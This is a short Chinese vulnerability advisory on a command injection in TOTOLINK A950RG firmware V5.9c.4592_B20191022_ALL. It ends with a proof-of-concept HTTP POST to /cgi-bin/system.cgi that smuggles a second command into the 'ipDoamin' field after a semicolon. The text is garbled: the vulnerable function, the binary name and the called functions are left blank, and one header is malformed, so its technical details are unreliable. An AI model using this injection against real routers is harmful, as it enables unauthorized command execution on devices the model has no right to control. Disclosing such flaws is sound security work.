关键信息 1. 漏洞概述 受影响产品: TOTOLINK A950RG 固件版本: V5.9c.4592_B20191022_ALL 漏洞类型: 命令注入 脆弱组件: (函数 ) 2. 原因及路径 数据流: 用户输入通过 获取 → 直接拼接到 命令 → 通过 执行。 利用路径: 导致任意命令执行。 前提条件: 没有进行任何清理或过滤,攻击者控制的输入直接传递到系统命令中。 3. 易受攻击的二进制文件: 4. 0-Day 命令注入利用路径 在 函数中: line 7 执行 ,获取与关键词 相关的网络输入。 所获取的值随后被拼接并在 line 9 通过 直接传递,从而触发命令注入漏洞。 5. 漏洞复现概念证明 (PoC) ```http POST /cgi-bin/system.cgi HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 Accept: / Content-Type: application/x-www-form-urlencoded Content-Length: 80 Connection: close ipDoamin=www.baidu.com;INJECTED_COMMAND